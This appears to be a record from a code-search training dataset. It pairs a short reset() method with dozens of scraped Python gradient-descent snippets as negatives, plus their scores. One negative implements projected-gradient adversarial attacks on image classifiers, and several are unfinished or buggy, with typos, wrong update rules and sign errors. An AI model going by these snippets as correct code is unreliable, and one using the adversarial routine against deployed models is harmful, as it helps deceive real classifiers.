raise NotImplementedError", "def gradientFunction(theta, X, y):\n y = y[:, 0]\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad /= m\n return grad", "def forward_and_gradient(self, inputs):\n raise NotImplementedError", "def miniBatchGD(X, y, batch_size = 50, learn_rate = 0.005, num_iter = 100):\n #set all coefficients initially to zero\n n_points = X.shape[0]\n W = np.zeros(X.shape[1]) # coefficients\n b = 0 # intercept\n \n # run iterations\n regression_coef = [np.hstack((W,b))]\n \n # run the gradient descent process multiple times to optimize the parameters\n for _ in range(num_iter):\n batch = np.random.choice(range(n_points), batch_size)\n \n X_batch = X[batch,:]\n y_batch = y[batch]\n \n W, b = MSEStep(X_batch, y_batch, W, b, learn_rate)\n regression_coef.append(np.hstack((W,b)))\n \n return regression_coef", "def gradient_descent_step(self, data_batch, eta, lambda_r, n):\n images = np.array([x_ for x_, y_ in data_batch])\n labels = np.array([y_ for x_, y_ in data_batch])\n\n gradient_weights, gradient_biases = self.backpropagation(images, labels)\n\n self.weights = [(1 - lambda_r * eta / n) * w - (eta / len(data_batch)) * nw\n for w, nw in zip(self.weights, gradient_weights)]\n self.biases = [b - (eta / len(data_batch)) * nb\n for b, nb in zip(self.biases, gradient_biases)]", "def gradient(data_x, data_y, parameters):\n return data_x.T @ (data_x @ parameters - data_y) / data_x.shape[0]", "def fit(self, X, y, alpha, n_epochs):\n y = self.__one_hot(y)\n \n # perform training epochs\n for i in range(n_epochs):\n print(\"Epoch\", i)\n # stochastic gradient descent\n for j in range(len(X)):\n self.__backpropagation(X[j], y[j], alpha)", "def stochastic_grad_descent(X, y, alpha=0.1, lambda_reg=1, num_iter=1000, checkin=100):\n num_instances, num_features = X.shape[0], X.shape[1]\n theta = np.ones(num_features) #Initialize theta\n theta_hist = np.zeros((num_iter, num_instances, num_features)) #Initialize theta_hist\n loss_hist = np.zeros((num_iter, num_instances)) #Initialize loss_hist\n epoch = 1\n while epoch < num_iter:\n instance = 1\n while instance < num_instances:\n if alpha == \"1/sqrt(t)\":\n alpha_0 = .01/np.sqrt(instance)\n elif alpha == \"1/t\":\n alpha_0 = .01/float(instance)\n else:\n alpha_0 = alpha\n index = np.random.randint(num_instances)\n vec = np.reshape(X[index,:].T,(1,49))\n grad = compute_regularized_square_loss_gradient(vec,y[index],theta,lambda_reg)\n theta = theta - alpha_0*grad\n theta_hist[epoch][instance] = theta\n loss_hist[epoch][instance] = compute_square_loss(vec,y[index],theta)\n instance += 1\n\n if type(checkin) is int and epoch%checkin==0:\n print(\"completed training epoch {}...\".format(epoch))\n \n epoch += 1\n\n return theta_hist, loss_hist", "def gradient_descent(loss_gradient,\n x, y, batch_size, n_epochs, shuffle_: bool,\n l2, learning_rate, decay):\n start = numpy.zeros((x.shape[1],))\n\n w = start\n for num in range(n_epochs):\n if shuffle_:\n x, y = shuffle(x, y)\n batch_iterator = (\n (x[start:start + batch_size], y[start:start + batch_size])\n for start in range(0, x.shape[0], batch_size)\n )\n\n for bx, by in batch_iterator:\n grad = loss_gradient(w, bx, by) + l2_regularization_gradient(l2, w)\n w += -learning_rate * grad\n learning_rate *= decay\n return w", "def gradient_model (self, x, initial_weights = None, \\\n step_size = 5.0e-6, tol = 2.5e+7, n_iters = 501, l2 = 0):\n # setup initial intercept, slope, iter number and rss\n if initial_weights is None:\n weights = self.initial_weight\n else:\n weights = initial_weights\n # Compute indicator value for (y_i = +1)\n indicators = np.array([int (i) for i in (self.train_output_y==1)])\n for itr in range(n_iters):\n # Predict P(y_i = +1|x_1,w) using your predict_probability() function\n _, pred_probs = self.predict_probability(self.train_feature_x, weights)\n \n # Compute the errors as indicator - predictions\n errors = indicators - pred_probs\n\n #Update the weights:\n derivative = self.feature_derivative(errors, weights, l2)\n weights = weights + derivative * (step_size) \n \n #check if converged\n #todo\n \"\"\"\n # Checking whether log likelihood is increasing\n if itr <= 15 or (itr <= 100 and itr % 10 == 0) or (itr <= 1000 and itr % 100 == 0) \\\n or (itr <= 10000 and itr % 1000 == 0) or itr % 10000 == 0:\n lp = self.compute_log_likelihood(indicators,weights)\n print 'iteration %*d: log likelihood of observed labels = %.8f' % \\\n (int(np.ceil(np.log10(n_iters))), itr, lp)\n \"\"\"\n \n #check weights\n #print \"\\n\"\n #print \"The weights for features: \", weights\n #final prediction\n preds = self.prediction(x, weights)\n return preds, weights", "def curves_gradient_descent(theta, m_, learning_rate=0.001, iterations=1000):\n for i in range(iterations):\n theta = theta - learning_rate * curves_gradient(theta, m_)\n return theta", "def stochasticGradientDescent(x,y,theta,alpha):\n m,n = np.shape(x)\n convergence = 0.000000001\n lastCost = 0\n cost = -1 \n recurseCount = 0\n while abs(lastCost - cost) > convergence: # rcurse until converge\n lastCost = cost\n hypothesis = np.dot(x,theta) \n for i in range(m):\n # alpha = 4.0 / (1.0 + i) + 0.01 \n loss = hypothesis[i] - y[i]\n # gradient = np.dot(x[i],loss)\n gradient = x[i,:].transpose() * loss \n theta = theta - alpha * gradient\n cost = np.sum((hypothesis-y)**2)/(2*m)\n recurseCount += 1\n return recurseCount,theta", "def gradient_descent(objective_function, derivative, boundaries, iterations, step_size):\n # create lists to track all outputs\n outputs = list()\n scores = list()\n # get a random point within the boundaries\n output = boundaries[:, 0] + rand(len(boundaries)) * (\n boundaries[:, 1] - boundaries[:, 0]\n )\n # for each iteration in the iter object\n for i in range(iterations):\n # calculate gradient\n gradient = derivitive(output) # Code breaks here -\n # take a step\n output = output - step_size * gradient\n # evaluate candidate point\n output_eval = objective_function(output)\n # store output\n outputs.append(output)\n scores.append(output_eval)\n # report progress\n print(output, output_eval)\n return [outputs, scores]", "def train(self, X, y, learning_rate=1e-3, reg=1e-5, num_iters=100,\n batch_size=200, verbose=False):\n num_train, dim = X.shape\n num_classes = np.max(y) + 1 # assume y takes values 0...K-1 where K is number of classes\n if self.W is None:\n # lazily initialize W\n self.W = 0.001 * np.random.randn(dim, num_classes)\n\n # Run stochastic gradient descent to optimize W\n loss_history = []\n for it in range(num_iters):\n X_batch = None\n y_batch = None\n\n #########################################################################\n # TODO: #\n # Sample batch_size elements from the training data and their #\n # corresponding labels to use in this round of gradient descent. #\n # Store the data in X_batch and their corresponding labels in #\n # y_batch; after sampling X_batch should have shape (batch_size, dim) #\n # and y_batch should have shape (batch_size,) #\n # #\n # Hint: Use np.random.choice to generate indices. Sampling with #\n # replacement is faster than sampling without replacement. #\n #########################################################################\n choices = np.random.choice(num_train, batch_size)\n X_batch = X[choices]\n y_batch = y[choices]\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n # evaluate loss and gradient\n loss, grad = self.loss(X_batch, y_batch, reg)\n loss_history.append(loss)\n\n # perform parameter update\n #########################################################################\n # TODO: #\n # Update the weights using the gradient and the learning rate. #\n #########################################################################\n self.W -= learning_rate * grad\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n if verbose and it % 100 == 0:\n print('iteration %d / %d: loss %f' % (it, num_iters, loss))\n\n return loss_history", "def exp_grad(self, xs, *args, **kwargs):\n raise NotImplementedError", "def projected_gradient_descent(self, x, y):\n x_adv = x.clone().detach().requires_grad_(True).to(x.device)\n targeted = self.y_target is not None\n num_channels = x.shape[1]\n\n if self.random:\n x_adv = random_perturbation(x_adv, self.norm, self.eps)\n\n for i in range(self.num_steps):\n _x_adv = x_adv.clone().detach().requires_grad_(True)\n\n prediction = self.model(_x_adv)\n loss = self.loss_fn(prediction, self.y_target if targeted else y)\n loss.backward()\n\n with torch.no_grad():\n # Force the gradient step to be a fixed size in a certain norm\n if self.norm == 'inf':\n gradients = _x_adv.grad.sign() * self.step_size\n else:\n # Note .view() assumes batched image data as 4D tensor\n gradients = _x_adv.grad * self.step_size / _x_adv.grad.view(\n _x_adv.shape[0], -1) \\\n .norm(self.norm, dim=-1) \\\n .view(-1, num_channels, 1, 1)\n\n if targeted:\n # Targeted: Gradient descent with on the loss of the (incorrect) target label\n # w.r.t. the image data\n x_adv -= gradients\n else:\n # Untargeted: Gradient ascent on the loss of the correct label w.r.t.\n # the model parameters\n x_adv += gradients\n\n # Project back into l_norm ball and correct range\n if self.norm == 'inf':\n # Workaround as PyTorch doesn't have elementwise clip\n x_adv = torch.max(torch.min(x_adv, x + self.eps), x - self.eps)\n else:\n delta = x_adv - x\n\n # Assume x and x_adv are batched tensors where the first dimension is\n # a batch dimension\n mask = delta.view(delta.shape[0], -1).norm(self.norm,\n dim=1) <= self.eps\n\n scaling_factor = delta.view(delta.shape[0], -1).norm(self.norm,\n dim=1)\n scaling_factor[mask] = self.eps\n\n # .view() assumes batched images as a 4D Tensor\n delta *= self.eps / scaling_factor.view(-1, 1, 1, 1)\n\n x_adv = x + delta\n\n x_adv = x_adv.clamp(*self.clamp)\n\n return x_adv.detach()", "def lr_cost_function_grad(theta: np.ndarray, X: np.ndarray, y: np.ndarray, l: float) -> np.ndarray:\n # Initialize some useful values\n m = len(y) # number of training examples\n\n # You need to return the following variable correctly.\n grad = np.zeros(theta.shape)\n\n # ====================== YOUR CODE HERE ======================\n # Instructions: Compute the partial derivatives and set grad to the partial\n # derivatives of the cost w.r.t. each parameter in theta.\n\n # =============================================================\n return grad", "def GradientDescent(x, y, theta, alpha, tolerate, maxiterate, epsilon):\n i = 0 # set the iteration counting index\n tolerate_rule = 1 # set the initial tolerate rate\n n = x.shape[0]\n current_theta = theta\n scost_vector = np.empty([0, 1])\n lcost_vector = np.empty([0, 1])\n hcost_vector = np.empty([0, 1])\n\n # iterate\n while tolerate_rule >= tolerate and i <= maxiterate:\n sl = np.array(SquareLoss(x, y, current_theta)).reshape([1, 1])\n scost_vector = np.append(scost_vector, sl, axis=0) # store cost\n abs = np.array(AbsoluteLoss(x, y, current_theta)).reshape([1, 1])\n lcost_vector = np.append(lcost_vector, abs, axis=0) # store cost\n hbs = np.array(HuberLoss(x, y, current_theta, epsilon)).reshape([1, 1])\n hcost_vector = np.append(hcost_vector, hbs, axis=0) # store cost\n fx = x @ current_theta\n update_theta = current_theta - alpha * (1/n) * x.transpose() @ (fx - y)\n tolerate_rule = np.minimum(np.abs(update_theta - current_theta))\n i += 1\n current_theta = update_theta\n\n cost_matrix = np.asmatrix(np.stack((scost_vector, lcost_vector,\n hcost_vector),\n axis=-1))\n cost_dataframe = pd.DataFrame(cost_matrix, columns=['AbsoluteLoss',\n 'SquareLoss',\n 'HuberLoss'])\n return(current_theta, cost_dataframe)", "def fit(self, X, y):\n\n n, m = X.shape[0], X.shape[1]\n\n # theta is (nx1) (one theta per dimension)\n self.theta = np.random.uniform(-10, 10, (n, 1))\n\n for i in range(self.epochs):\n # Get predictions\n y_pred = self.predict(X)\n\n # calculate cost\n # cost = ...\n cost = self._cost_function(y_pred, y, m)\n \n\n # gradient is an (n) x 1 array, it refers to the derivate per theta\n gradient = self._cost_function_derivative(y_pred, y, X, m)\n\n # delta/update rule\n self.theta = gradient\n\n self.costs.append(cost)\n pass\n\n print(\"Final theta is {} (cost: {})\".format(self.theta.T, cost))", "def trainLogRegres(train_x, train_y, opts):\n startTime = time.time() # calculate training time\n\n numSamples, numFeatures = np.shape(train_x)\n alpha = opts['alpha']\n maxIter = opts['maxIter']\n weights = np.ones((numFeatures, 1))\n\n for k in range(maxIter):\n if opts['optimizeType'] == 'stocGradDescent': # stochastic gradient descent\n for i in range(numSamples):\n output = sigmoid(train_x[i, :] * weights)\n loss = train_y[i, 0] - output\n weights = weights + alpha * train_x[i, :].transpose() * loss\n elif opts[\n 'optimizeType'] == 'smoothStocGradDescent': # smooth stochastic gradient descent. randomly select samples to optimize for reducing cycle fluctuations.\n dataIndex = list(range(numSamples))\n for i in range(numSamples):\n alpha = 4.0 / (1.0 + k + i) + 0.01\n randIndex = int(np.random.uniform(0, len(dataIndex)))\n output = sigmoid(train_x[randIndex, :] * weights)\n loss = train_y[randIndex, 0] - output\n weights = weights + alpha * train_x[randIndex, :].transpose() * loss\n del (dataIndex[randIndex])\n print('Congratulations, training complete! Took %fs!' % (time.time() - startTime))\n return weights", "def gradient_function(X, t, flow, species_list):\n vals = {\"t\": t}\n\n for i, species in enumerate(species_list):\n vals[species] = X[i]\n\n result = []\n\n for species in flow:\n result.append(flow[species].evalf(subs=vals))\n\n return result", "def gradient_descent(self, X, theta, Y, m):\n\n Z = X.dot(theta)\n H = Predict.g(Z)\n gradient = np.dot(X.T, (H - Y)) / m\n return self.alpha * gradient", "def get_batch_grad(f, inputs):\n nsamples = inputs.shape[0]\n grads = torch.zeros_like(inputs)\n input_values = inputs.detach().numpy()\n for i in range(nsamples):\n x = torch.tensor(input_values[[i]], requires_grad=True)\n y = f(x)\n y.backward()\n grads[i] = x.grad\n return grads", "def RatingsGradientDescent(params, Y, R, num_users, num_movies, num_features, lbd, alpha, num_iters):\n J_history = np.zeros(num_iters)\n for i in range(num_iters):\n J_history[i], grad = cofiCostFunc(params, Y, R, num_users, num_movies, num_features, lbd)\n params = params-alpha*grad\n if i % 100 == 99:\n print('Step %i, cost=%f' % (i+1, J_history[i]))\n return params, J_history", "def gradientFunctionReg(theta, X, y, Lambda): \n y = np.squeeze(y)\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad[1:] = grad[1:] + Lambda*theta[1:]\n grad /= m\n\n return grad", "def train(self, X, y, learning_rate=1e-3, num_iters=100,\n batch_size=200, verbose=False):\n num_train, dim = X.shape\n num_classes = np.max(y) + 1 # assume y takes values 0...K-1 where K is number of classes\n\n self.init_weights(dims=[np.max(y) + 1, X.shape[1]])\t# initializes the weights of self.W\n\n # Run stochastic gradient descent to optimize W\n loss_history = []\n\n for it in np.arange(num_iters):\n X_batch = None\n y_batch = None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Sample batch_size elements from the training data for use in \n # gradient descent. After sampling,\n # - X_batch should have shape: (dim, batch_size)\n # - y_batch should have shape: (batch_size,)\n # The indices should be randomly generated to reduce correlations\n # in the dataset. Use np.random.choice. It's okay to sample with\n # replacement.\n # ================================================================ #\n mask = np.random.choice(num_train, batch_size, replace=True)\n \n X_batch = X[mask] # (dim, batch_size)\n y_batch = y[mask] # (batch_size,)\n \n pass\n \n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n # evaluate loss and gradient\n loss, grad = self.fast_loss_and_grad(X_batch, y_batch)\n loss_history.append(loss)\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Update the parameters, self.W, with a gradient step \n # ================================================================ #\n pass\n \n self.W = self.W - learning_rate*grad\n \n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n if verbose and it % 100 == 0:\n print('iteration {} / {}: loss {}'.format(it, num_iters, loss))\n\n return loss_history", "def train(self, X, Y, num_iterations = 1000, learning_rate = 0.01, print_cost = False, plot_cost = False):\n costs = []\n \n for i in range(num_iterations + 1):\n grads, cost = self.propagate(X,Y)\n \n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n # Update rule\n self.weight = self.weight - learning_rate * dw\n self.bias = self.bias - learning_rate * db\n \n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n \n # Print the cost every 100 training examples\n if print_cost and i % 100 == 0:\n print(f\"cost after iteration: {i} is {np.round(cost, 4)}\")\n \n grads = {\"dw\": dw,\n \"db\": db}\n\n if plot_cost:\n plt.plot(np.arange(len(costs)) * 100, costs)\n plt.xlabel(\"epoch\")\n plt.ylabel(\"cost\")\n plt.title(f\"Logistic curve fitting loss function (learning rate={learning_rate})\")\n plt.show()\n \n return grads, costs", "def gradient(theta, X, y, learning_rate):\n m = len(y)\n\n theta = theta.reshape((-1,1))\n grad = np.zeros(theta.shape)\n h = sigmoid(np.dot(X, theta)) \n \n grad = np.dot((h-y).T, X)/m\n grad = grad.T\n grad[1:] += (learning_rate/m)*theta[1:]\n return grad", "def _apply_gradient_descent(self, gradients):\n updated_sd = {}\n global_model = self._get_global_model()\n \n for name, param, grad in zip(global_model.keys(), global_model.values(), gradients):\n updated_sd[name] = param - self.global_lr * grad\n \n self._load_global_model(updated_sd)", "def train(self, inputs, targets, batch_size=10, learning_rate=0.1):\n\n # Shuffle indices for random batches.\n indices = list(range(len(inputs)))\n random.shuffle(indices)\n batches = [\n indices[i : i + batch_size] for i in range(0, len(indices), batch_size)\n ]\n\n for batch in batches:\n # Average partial derivatives for the batch.\n ws_d = [np.zeros(w.shape) for w in self.ws]\n bs_d = [np.zeros(b.shape) for b in self.bs]\n for i in batch:\n ws_dd, bs_dd = self.backprop(inputs[i], targets[i])\n for i in range(1, len(self.ws)):\n ws_d[i] += ws_dd[i]\n bs_d[i] += bs_dd[i]\n\n # Update weights and biases based on partial derivatives.\n for i in range(1, len(self.ws)):\n self.ws[i] -= learning_rate * ws_d[i] / len(batch)\n self.bs[i] -= learning_rate * bs_d[i] / len(batch)", "def train(self, X, y, learning_rate=1e-3, num_iters=100,\n batch_size=200, verbose=True):\n num_train, dim = X.shape\n\n if self.w is None:\n self.w = 0.001 * np.random.randn(dim)\n\n loss_history = []\n\n # 将feature与label连起来,方便后面batch的划分\n all_data = list(zip(X, y))\n\n for it in xrange(num_iters):\n X_batch = None\n y_batch = None\n\n #########################################################################\n # TODO: #\n # Sample batch_size elements from the training data and their #\n # corresponding labels to use in this round of gradient descent. #\n # Store the data in X_batch and their corresponding labels in #\n # y_batch; after sampling X_batch should have shape (batch_size, dim) #\n # and y_batch should have shape (batch_size,) #\n # #\n # Hint: Use np.random.choice to generate indices. Sampling with #\n # replacement is faster than sampling without replacement. #\n #########################################################################\n\n # batch_data = np.random.choice(all_data, batch_size, False) \n # error: ValueError: a must be 1-dimensional \n # 查询相关api貌似该方法不能用于数组中元素为元组情况下的选取\n batch_data = random.sample(all_data, batch_size)\n X_batch, y_batch = zip(*batch_data)\n X_batch = np.array(X_batch)\n y_batch = np.array(y_batch)\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n # evaluate loss and gradient\n\n loss, grad = self.loss(X_batch, y_batch)\n loss_history.append(loss)\n\n # perform parameter update\n #########################################################################\n # TODO: #\n # Update the weights using the gradient and the learning rate. #\n #########################################################################\n self.w += float(learning_rate) * np.array(grad)\n #########################################################################\n # END OF YOUR CODE #\n #########################################################################\n\n if verbose and (it % 1000 == 0 or it == num_iters - 1):\n print('iteration %d / %d: loss %f' % (it, num_iters, loss))\n\n return loss_history", "def learn(self, Xtrain, ytrain):\n self.cost_data = []\n self.weights = np.zeros((len(self.params['features']), 1))\n numsamples = Xtrain.shape[0]\n Xless = Xtrain[:,self.params['features']]\n y = ytrain[:, np.newaxis]\n\n cur_cost = float(\"inf\")\n tolerance = 10 ** -6\n new_cost = self.cost(self.weights, Xless, y, self.params['regwgt'], numsamples)\n while abs(new_cost - cur_cost) > tolerance:\n cur_cost = new_cost\n gradient = np.dot(np.transpose(Xless), np.subtract(np.dot(Xless, self.weights), y)) / numsamples #+ (2 * self.params['regwgt'] * self.weights)\n step_size = self.line_search(self.weights, new_cost, gradient, Xless, y, self.params['regwgt'], numsamples)\n self.weights = self.weights - (step_size * gradient)\n new_cost = self.cost(self.weights, Xless, y, self.params['regwgt'], numsamples)\n\n #Format properly for the error function\n self.weights = np.ndarray.flatten(self.weights)", "def train(self, X_train, y_train, batch_size, num_epochs, alpha=0.8):\r\n batch_split = tf.data.Dataset.from_tensor_slices((X_train, y_train))\r\n batch_split = batch_split.batch(batch_size)\r\n for epoch in range(num_epochs):\r\n for step, (i,j) in enumerate(batch_split):\r\n with tf.GradientTape() as tape:\r\n predictions = self.predict(i)\r\n loss = self.calculate_loss(j, predictions)\r\n dloss_dw, dloss_db = tape.gradient(loss, [self.weights, self.biases])\r\n for k in range(len(self.weights)):\r\n self.weights[k].assign_sub(alpha * dloss_dw[k])\r\n self.biases[k].assign_sub(alpha * dloss_db[k])", "def gradient_ascent_step(func, inputs, step_size):\n raise NotImplementedError", "def test_multiclass_gradient_descent_blobs():\n from your_code import MultiClassGradientDescent\n\n np.random.seed(0)\n\n features, _, targets, _ = load_data('blobs')\n\n learner = MultiClassGradientDescent(loss='squared', regularization=None,\n learning_rate=0.01, reg_param=0.05)\n learner.fit(features, targets, batch_size=None, max_iter=1000)\n predictions = learner.predict(features)\n\n print(\"predictions: \", predictions)\n print(\"targets: \", targets)", "def compute_gradient(self, function, arguments):", "def loss(self, X, y=None, reg=0.0):\r\n Ws = self.weights\r\n bs = self.biases\r\n N, D = X.shape # number of samples, number of features per sample\r\n\r\n # Compute the forward pass\r\n self.activations = []\r\n for i in xrange(len(Ws)): # for each set of weights\r\n W,b = Ws[i], bs[i]\r\n if i == 0:\r\n H = np.dot(X,W) + b\r\n else:\r\n H = np.dot(self.activations[-1],W) + b\r\n if i < len(Ws) - 1: # if we're computing hidden activations, apply nonlinear function\r\n H = (H > 0) * (H) + (H < 0) * (H/100.0)\r\n self.activations.append(H)\r\n scores = self.activations[-1]\r\n \r\n # If there's no labels provided, stop here\r\n if y is None:\r\n return scores\r\n\r\n # Compute the loss\r\n exped_scores = np.exp(scores)\r\n sums = np.sum(exped_scores,axis=1)\r\n # softmax classifier loss\r\n data_loss = (-1.0/N) * np.sum(np.log(exped_scores[range(N),y.astype(int)] / sums))\r\n\r\n # loss due to regularization\r\n reg_loss = 0\r\n for i in xrange(len(Ws)):\r\n reg_loss += np.sum(Ws[i]**2)\r\n reg_loss *= reg*(0.5)\r\n\r\n loss = data_loss + reg_loss\r\n \r\n # Compute gradients\r\n weights_grads = []\r\n biases_grads = []\r\n activation_grads = []\r\n for i in xrange(len(Ws)):\r\n weights_grads.append(np.copy(Ws[i]))\r\n biases_grads.append(np.copy(bs[i]))\r\n activation_grads.append(np.copy(self.activations[i]))\r\n\r\n DlossDscores = np.array(exped_scores / (N * np.matrix(sums).T))\r\n DlossDscores[range(N),y.astype(int)] -= (1.0/N)\r\n \r\n for i in xrange(len(Ws)-1,-1,-1):\r\n if i == 0:\r\n weights_grads[0] = np.dot(X.T, activation_grads[0]) + reg*Ws[0]\r\n biases_grads[0] = np.dot(np.ones((1,N)), activation_grads[0])[0]\r\n elif i == len(Ws)-1:\r\n H = self.activations[i-1]\r\n weights_grads[i] = np.dot(H.T, DlossDscores) + reg*Ws[i]\r\n biases_grads[i] = np.dot(np.ones((1,N)), DlossDscores)[0]\r\n dH = np.dot(DlossDscores, Ws[i].T)\r\n activation_grads[i-1] = dH\r\n else:\r\n H = self.activations[i-1]\r\n dH_out = activation_grads[i]\r\n weights_grads[i] = np.dot(H.T, dH_out) + reg*Ws[i]\r\n biases_grads[i] = np.dot(np.ones((1,N)), dH_out)[0]\r\n dH = np.dot(dH_out, Ws[i].T)\r\n dH = dH * (H > 0) + dH/100.0 * (H < 0)\r\n activation_grads[i-1] = dH\r\n \r\n grads = {}\r\n grads['weights'] = weights_grads\r\n grads['biases'] = biases_grads\r\n\r\n return loss, grads", "def simple_train(self, data_set, learning_rate=0.01, steps=100):\n for _ in range(steps):\n for feature, label in data_set:\n utop = self.network.forward(*[Unit(k) for k in feature])\n if label > 0 and utop.value < 1:\n pull = 1\n elif label < 0 and utop.value > -1:\n pull = -1\n else:\n pull = 0\n # Set the gradient of final unit and then backward to get the direction (gradient) of corresponding parameters\n # We can also set the pull (i.e. gradient) more/less than 1 to make the adjust more efficient\n self.network.set_utop_gradient(pull)\n self.network.backward()\n self.network.pull_weights(learning_rate)", "def train_step(model, features, labels):\n with tf.GradientTape() as tape:\n predictions = model(features, training=True)\n loss = loss_func(labels, predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n\n train_loss.update_state(loss)\n train_metric.update_state(labels, predictions)", "def run_gradient_descent(seed=0):\n random.seed(seed)\n colors = [color for color in matplotlib.colors.cnames]\n\n def random_point():\n return (2 * random.random() - 1, 2 * random.random() - 1)\n\n def df(x_i):\n \"\"\"this is the gradient of x^2 + y^2\"\"\"\n return [2 * x_ij for x_ij in x_i]\n\n for color in random.sample(colors, 50):\n path = take(10, gradient_descent(df, random_point()))\n for i, (x, y) in enumerate(path):\n plt.plot(x, y, color=color, marker='*', markersize=20-2*i)\n\n plt.show()", "def gradient_ascent(self, w, X, y, lr):\r\n # INSERT YOUR CODE HERE\r\n #raise Exception('Function not yet implemented!')\r\n # gradient = x_j*(y-σ(wTX))\r\n return np.dot(X.T, y-self.sigmoid(np.dot(X, w)))", "def train(features, targets, weights, bias):\n # see gradient_descent for explanation\n epochs = 100\n learning_rate = 0.1\n\n picture_nb = 2\n\n # Print current accuracy. How many people have been classified as sick/healthy correctly?\n predictions = predict(features, weights, bias)\n print(\"Accuracy: \", np.mean(predictions == targets))\n\n for epoch in range(epochs):\n if epoch % 10 == 0:\n # get normalized scores\n predictions = activation(pre_activation(features, weights, bias))\n # compare with targets to see how bad our algorithm is\n print(\"Cost = %s\" % cost(predictions, targets))\n # Replot graph. Check in create_dataset for explanation of parameters\n if picture_nb == 2:\n plt.plot(features[:, 0], (weights[0] * features[:, 0] + bias) / -weights[1], color='red')\n elif picture_nb == 11:\n plt.plot(features[:, 0], (weights[0] * features[:, 0] + bias) / -weights[1], color='green')\n else:\n plt.plot(features[:, 0], (weights[0] * features[:, 0] + bias) / -weights[1], color='orange')\n picture_nb+=1\n\n # Initialize gradients\n # weights_gradients is 2D array with 2 values\n weights_gradients = np.zeros(weights.shape)\n bias_gradient = 0\n # Go through each row\n for feature, target in zip(features, targets):\n # Compute prediction\n z = pre_activation(feature, weights, bias)\n # Get normalized score\n y = activation(z)\n # Update gradients based on formulas established before. Look at gradient_descent to understand what we\n # are doing. Also, the formulas are below, just before the call of the function train.\n weights_gradients += (y - target) * derivative_activation(z) * feature\n # no multiplication of feature because it does not depend on some coordinates.\n bias_gradient += (y - target) * derivative_activation(z)\n\n # Update variables. These are the lines that result the cost to get reduced.\n weights = weights - learning_rate * weights_gradients\n bias = bias - learning_rate * bias_gradient\n\n # Print final accuracy. How many people have been classified as sick/healthy correctly?\n predictions = predict(features, weights, bias)\n print(\"Accuracy: \", np.mean(predictions == targets))\n\n plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral)\n plt.savefig(\"DataPointsLineEvolution.png\")\n # legend for understanding\n plt.legend(['Original division', 'New division', 'New division', 'New division', 'New division', 'New division',\n 'New division', 'New division', 'New division', 'Final division'], loc='upper left')\n # save picture of data points drawn.\n plt.savefig(\"DataPointsLineEvolutionLegend.png\")", "def _learn_using_SGD(self, y, tx, w, batch_size, fn, gamma, lambda_, regularization):\n for y_batch, tx_batch in batch_iter(y, tx, batch_size=batch_size, num_batches=1):\n loss, grad = fn(y_batch, tx_batch, w, lambda_)\n loss, grad = self.apply_regularization(w, loss, grad, regularization, lambda_, tx.shape[0])\n w = w - gamma * grad\n return loss, w", "def _evaluate_gradient(self, **variables):\n pass", "def optimize_sgd(beta, X, y, num_iterations, step_size):\n \n N = X.shape[0]\n P = X.shape[1]\n costs = []\n #variable step size\n if step_size == 'rm': #Robbins–Monro rule\n t0 = 2\n C = 1\n alpha = 0.5\n for i in range(num_iterations): \n j = random.randint(0,N-1) #Randomly sample a datapoint with replacement\n \n # Here I only pick a slice of X and an entry of y\n # To reuse our codes for standard GD, \n dbeta, cost = propagate(beta, X[j,:].reshape(1,P), y[j,:].reshape(1,1)) \n \n beta -= dbeta * C * ((num_iterations + t0)**(-alpha)) \n \n if i%1000 == 0:\n _, cost = propagate(beta, X, y) \n costs.append(cost.flatten())\n \n else: # constant step size\n step_size = float(step_size)\n for i in range(num_iterations):\n j = random.randint(0,N-1) #Randomly sample a datapoint with replacement\n \n # Here I only pick a slice of X and an entry of y\n # To reuse our codes for standard GD, \n dbeta, cost = propagate(beta, X[j,:].reshape(1,P), y[j,:].reshape(1,1)) \n \n beta -= dbeta * step_size\n \n if i%1000 == 0:\n _, cost = propagate(beta, X, y) \n costs.append(cost.flatten())\n \n \n return beta, costs" ]
[ "0.7502321", "0.73805606", "0.72277737", "0.7210376", "0.71823865", "0.7039117", "0.6943254", "0.69380903", "0.6851058", "0.68016803", "0.66611814", "0.6622531", "0.6600367", "0.65702754", "0.656558", "0.655788", "0.65387475", "0.6533046", "0.6499761", "0.64804655", "0.6431845", "0.6398041", "0.6384216", "0.63816094", "0.63598675", "0.6336628", "0.6311704", "0.6264924", "0.62526715", "0.62387305", "0.6229099", "0.6216951", "0.62019753", "0.6192185", "0.61877626", "0.6176001", "0.6157371", "0.6146289", "0.6140622", "0.6135851", "0.612861", "0.61265534", "0.6122873", "0.6113275", "0.61084163", "0.61080873", "0.6071068", "0.60692817", "0.6054154", "0.6043185", "0.6041766", "0.6032926", "0.60323936", "0.6030732", "0.6020072", "0.60181767", "0.6014405", "0.6006019", "0.6001698", "0.599236", "0.5992058", "0.59814686", "0.59733915", "0.59594053", "0.59251696", "0.5920807", "0.5919988", "0.59127814", "0.58935857", "0.5883601", "0.58814955", "0.58765346", "0.5863652", "0.58634937", "0.5862332", "0.58604026", "0.5856421", "0.58503634", "0.58465004", "0.58317435", "0.58291805", "0.58280957", "0.5821844", "0.5816761", "0.5806616", "0.5804511", "0.58039457", "0.58034915", "0.5802762", "0.5800673", "0.57844096", "0.5763415", "0.5759988", "0.575535", "0.57490426", "0.57488096", "0.5724345", "0.57205623", "0.5719029", "0.5701306" ]
0.7124435
5
Reset all counters and greedy parameter
def reset(self): self.c_count = 0 self.a_count = -1 self.epsilon = self.init_epsilon
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
